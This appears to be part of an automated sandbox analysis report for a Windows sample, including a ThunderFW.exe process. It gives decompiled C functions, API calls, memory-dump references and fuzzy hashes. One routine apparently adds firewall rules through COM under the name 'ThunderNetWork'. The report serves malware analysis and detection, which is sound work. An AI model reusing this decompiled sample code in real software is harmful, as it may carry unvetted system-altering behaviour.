Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040196B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t10;
				void* _t14;
				WINDOWPLACEMENT* _t15;
				void* _t18;
				struct HWND__* _t23;
				intOrPtr* _t24;

				_t24 = __esi;
				_t18 = __eax;
				_t1 = _t24 + 4; // 0x40d794
				_t10 =  *_t1;
				_v8 = _t10;
				if(_t10 == 0) {
					memset(__eax + 0x248, 0, 0x2c);
				} else {
					_t23 =  *(__eax + 0x208);
					if(_t23 != 0) {
						_t15 = __eax + 0x248;
						_t15->length = 0x2c;
						GetWindowPlacement(_t23, _t15);
					}
				}
				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
				if(_v8 == 0) {
					_t14 = E004019D2(_t18);
				}
				return _t14;
			}

0x0040196b
0x00401970
0x00401972
0x00401972
0x00401977
0x0040197a
0x004019a7
0x0040197c
0x0040197c
0x00401984
0x00401986
0x0040198e
0x00401994
0x00401994
0x00401984
0x004019c1
0x004019c8
0x004019ca
0x004019ca
0x004019d1

APIs

GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
memset.MSVCRT ref: 004019A7

Strings

WinPos, xrefs: 004019BA

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769

Uniqueness

Uniqueness Score: -1.00%

Function 00407170, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
				void _v8198;
				short _v8200;
				int _t11;
				int _t16;

				E0040E340(0x2004, __ecx);
				_t16 = 0;
				_v8200 = 0;
				memset( &_v8198, 0, 0x2000);
				do {
					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
					if(_t11 > 0) {
						_t11 = E00406E5E(_t16,  &_v8200);
					}
					_t16 = _t16 + 1;
				} while (_t16 <= 0xffff);
				return _t11;
			}

0x00407178
0x0040717e
0x0040718d
0x00407194
0x0040719c
0x004071ac
0x004071b4
0x004071be
0x004071c4
0x004071c5
0x004071c6
0x004071d0

APIs

memset.MSVCRT ref: 00407194
LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

;t@, xrefs: 00407170

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$LoadString_itow
String ID: ;t@
API String ID: 2363904170-3941608961
Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 004073D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x004073d0
0x004073d1
0x004073d9
0x004073e3
0x004073e5
0x004073e5
0x004073f6

APIs

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 004073D9
wcscat.MSVCRT ref: 004073EF

Strings

_lng.ini, xrefs: 004073E9

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F

Uniqueness

Uniqueness Score: -1.00%

Function 004075A6, Relevance: 5.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}

0x004075a6
0x004075b0
0x004075b6
0x004075bc
0x004075c1
0x004075c3
0x004075c9
0x004075cf
0x004075d5
0x004075db
0x004075e1
0x004075eb
0x004075ee
0x004075f1
0x004075f7
0x00407601
0x0040760f
0x00407621
0x00407611
0x00407611
0x00407614
0x00407616
0x00407619
0x0040761c
0x0040761c
0x00407623
0x00407625
0x00407628
0x00407630
0x00407642
0x00407632
0x00407632
0x00407635
0x00407637
0x0040763a
0x0040763d
0x0040763d
0x00407644
0x00407646
0x00407649
0x00407651
0x00407663
0x00407653
0x00407653
0x00407656
0x00407658
0x0040765b
0x0040765e
0x0040765e
0x00407665
0x00407667
0x0040766a
0x00407672
0x00407684
0x00407674
0x00407674
0x00407677
0x00407679
0x0040767c
0x0040767f
0x0040767f
0x00407687
0x0040768d

APIs

Part of subcall function 00405CF8: memset.MSVCRT ref: 00405D06

??2@YAPAXI@Z.MSVCRT ref: 00407601
??2@YAPAXI@Z.MSVCRT ref: 00407628
??2@YAPAXI@Z.MSVCRT ref: 00407649
??2@YAPAXI@Z.MSVCRT ref: 0040766A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00406264, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E0040562D(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x0040626f
0x00406271
0x00406276
0x00406279
0x0040627c
0x0040627f
0x00406283
0x00406286
0x0040628a
0x0040628d
0x00406290
0x004062a0
0x00406292
0x00406294
0x00406294
0x004062a6
0x004062ac
0x004062b0
0x004062b3
0x004062c4
0x004062b5
0x004062b7
0x004062b7
0x004062db
0x004062e6
0x004062f3
0x004062f6
0x004062fd
0x00406303

APIs

wcslen.MSVCRT ref: 00406271
free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 00406294

Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A

free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 004062B7
memcpy.MSVCRT ref: 004062DB

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ThunderFW.exe PID: 5436 Parent PID: 4088 ThunderFW.exeCOMMON

Executed Functions

Function 00951058, Relevance: 1.5, APIs: 1, Instructions: 7comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0095DB0C,00000000,00000001,0095DB1C,?,00951135,00000000), ref: 0095106A

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9fdc2d7eb435d36cc23faaaaf4ab6507d3b7b2b6012115c723f3080272cc57d9
Instruction ID: 464c888a5a21b9cd98968ad4dde416a123d0ad2cba85c1ee777e2f7f499cd6fc
Opcode Fuzzy Hash: 9fdc2d7eb435d36cc23faaaaf4ab6507d3b7b2b6012115c723f3080272cc57d9
Instruction Fuzzy Hash: 41B012307D93007ADD3097934D07F057A5367C0F07F110400B600A40D2C2E20004E701

Uniqueness

Uniqueness Score: -1.00%

Function 00951372, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
comCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00951372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t135;
				void* _t163;
				void* _t166;
				signed int _t167;
				intOrPtr* _t169;

				_t167 = 0;
				_v16 = 0x80004005;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v28 = E009580F0(__edx, _a4);
				_v32 = E009580F0(__edx, "ThunderNetWork");
				_t85 = E009580F0(__edx, _a8);
				_v36 = _t85;
				__imp__CoInitializeEx(0, 2, _t166); // executed
				_v40 = _t85;
				if(_t85 == 0x80010106 || _t85 >= 0) {
					_t87 = E00951058( &_v24,  &_v24);
					_v16 = _t87;
					if(_t87 >= _t167) {
						_t95 = _v24;
						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
						_v16 = _t96;
						if(_t96 >= _t167) {
							_t97 = _v24;
							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
							_v16 = _t98;
							if(_t98 >= _t167) {
								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
									_v12 = _v12 ^ 0x00000004;
								}
								_t169 = __imp__CoCreateInstance;
								_t100 =  *_t169(0x95db2c, _t167, 1, 0x95db3c,  &_v8, _t163, _t135); // executed
								_v16 = _t100;
								if(_t100 >= 0) {
									_t101 = _v8;
									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
									_t103 = _v8;
									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
									_t105 = _v8;
									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
									_t107 = _v8;
									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
									_t109 = _v8;
									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
									_t111 = _v8;
									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
									_t113 = _v8;
									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
									_t115 = _v20;
									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
									_t118 =  *_t169(0x95db2c, 0, 1, 0x95db3c,  &_v8);
									_v16 = _t118;
									if(_t118 >= 0) {
										_t119 = _v8;
										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
										_t121 = _v8;
										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
										_t123 = _v8;
										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
										_t125 = _v8;
										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
										_t127 = _v8;
										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
										_t129 = _v8;
										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
										_t131 = _v8;
										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
										_t133 = _v20;
										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
									}
								}
								_t167 = 0;
							}
						}
					}
				}
				_t88 = _v8;
				if(_t88 != _t167) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				_t89 = _v20;
				if(_t89 != _t167) {
					 *((intOrPtr*)( *_t89 + 8))(_t89);
				}
				_t90 = _v24;
				if(_t90 != _t167) {
					 *((intOrPtr*)( *_t90 + 8))(_t90);
				}
				if(_v40 >= _t167) {
					__imp__CoUninitialize(); // executed
				}
				return _v16;
			}

0x0095137c
0x0095137e
0x00951385
0x00951388
0x0095138b
0x0095138e
0x0095139b
0x009513a6
0x009513a9
0x009513b1
0x009513b4
0x009513ba
0x009513c2
0x009513d0
0x009513d8
0x009513db
0x009513e1
0x009513eb
0x009513f0
0x009513f3
0x009513f9
0x00951403
0x00951408
0x0095140b
0x00951415
0x0095141d
0x0095141d
0x00951430
0x0095143c
0x0095143e
0x00951443
0x00951449
0x00951452
0x00951455
0x0095145e
0x00951461
0x0095146a
0x0095146d
0x00951475
0x00951478
0x00951481
0x00951487
0x0095148f
0x00951495
0x0095149d
0x009514a3
0x009514ac
0x009514b9
0x009514bb
0x009514c0
0x009514c2
0x009514cb
0x009514ce
0x009514d7
0x009514da
0x009514e3
0x009514e6
0x009514ee
0x009514f1
0x009514fa
0x00951500
0x00951508
0x0095150e
0x00951516
0x0095151c
0x00951528
0x00951528
0x009514c0
0x0095152c
0x0095152e
0x0095140b
0x009513f3
0x009513db
0x0095152f
0x00951534
0x00951539
0x00951539
0x0095153c
0x00951541
0x00951546
0x00951546
0x00951549
0x0095154e
0x00951553
0x00951553
0x0095155a
0x0095155c
0x0095155c
0x00951566

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 00951391
_com_util::ConvertStringToBSTR.COMSUPP ref: 0095139E

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

_com_util::ConvertStringToBSTR.COMSUPP ref: 009513A9

Part of subcall function 009580F0: _malloc.LIBCMT ref: 009581A1

CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 009513B4
CoCreateInstance.OLE32(0095DB2C,00000000,00000001,0095DB3C,?), ref: 0095143C
CoCreateInstance.OLE32(0095DB2C,00000000,00000001,0095DB3C,?), ref: 009514B9
CoUninitialize.OLE32 ref: 0095155C

Strings

ThunderNetWork, xrefs: 00951396

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
String ID: ThunderNetWork
API String ID: 3644708077-3075295172
Opcode ID: 3a312efbff9652f6b18710db0896a182db8c142db9a8a7adec62e5a512f55a22
Instruction ID: c8e65c2d5ecfc866a2413ad3f051f062b47c7124ea8ace3a0721ff3635ede484
Opcode Fuzzy Hash: 3a312efbff9652f6b18710db0896a182db8c142db9a8a7adec62e5a512f55a22
Instruction Fuzzy Hash: 3771E874A00209EFCB00DFE5C888A9EBBB9BF89305F204499F905EB251DB359A45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 009574CC, Relevance: 6.1, APIs: 4, Instructions: 93
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E009574CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0x95dec8);
				E00953F70(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00953FB5(_t21);
							}
							__eflags =  *0x960a20; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0x960a98 - 3;
						if( *0x960a98 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0x96093c, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0x960a84; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E00953C3D(0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E00956CFF();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E009575C8();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00954E20(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E009545B5(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E009538CA(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00953862(_t45, 0, __esi);
					goto L3;
				}
			}

0x009574cc
0x009574ce
0x009574d3
0x009574d8
0x009574df
0x0095750f
0x00957513
0x00957515
0x00957518
0x0095751a
0x0095751e
0x0095751e
0x0095751e
0x0095751f
0x0095751f
0x00957521
0x00957524
0x00957527
0x00957592
0x00957592
0x00957594
0x009575e2
0x009575e2
0x009575e4
0x009575e9
0x009575e9
0x00957596
0x0095759c
0x009575d1
0x009575d3
0x009575d5
0x009575d8
0x009575da
0x009575dc
0x009575dc
0x009575da
0x00000000
0x009575d3
0x00000000
0x0095759c
0x00957529
0x00957530
0x0095757d
0x0095757d
0x0095757f
0x00000000
0x00000000
0x00957581
0x0095758a
0x00957590
0x00000000
0x00957590
0x00957535
0x00957538
0x0095753e
0x00957544
0x00000000
0x00000000
0x00957548
0x0095754e
0x00957551
0x0095755a
0x0095755d
0x00957564
0x00957569
0x0095756c
0x0095756e
0x00000000
0x00000000
0x00957575
0x0095757a
0x00000000
0x0095759e
0x0095759f
0x009575a5
0x009575a5
0x009575ad
0x009575b0
0x009575b2
0x009575b8
0x009575b8
0x00957508
0x00957508
0x00000000
0x00957508
0x009574e3
0x009574e6
0x009574e6
0x009574eb
0x009574ed
0x009574ee
0x00000000
0x009574f0
0x009574f5
0x009574fb
0x009574fc
0x009574fd
0x009574fe
0x009574ff
0x00957500
0x00000000
0x00957505

APIs

__lock.LIBCMT ref: 00957548
___sbh_alloc_block.LIBCMT ref: 00957554
_memset.LIBCMT ref: 00957575
RtlAllocateHeap.NTDLL(00000008,?,0095DEC8,0000000C,00955589,00000000,?,00000000,00000000,00000000,?,0095334F,00000001,00000214,?,00000000), ref: 0095758A

Part of subcall function 009538CA: __getptd_noexit.LIBCMT ref: 009538CA

Part of subcall function 00953862: __decode_pointer.LIBCMT ref: 0095386D

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
String ID:
API String ID: 3771094184-0
Opcode ID: 95bded22317dd3d28b3b43a871cf815c688f077ac94502f82c98452fd441bfba
Instruction ID: dc8116893aae5be32f46579975cdec4f71af25787f56038f9f656222686b80a2
Opcode Fuzzy Hash: 95bded22317dd3d28b3b43a871cf815c688f077ac94502f82c98452fd441bfba
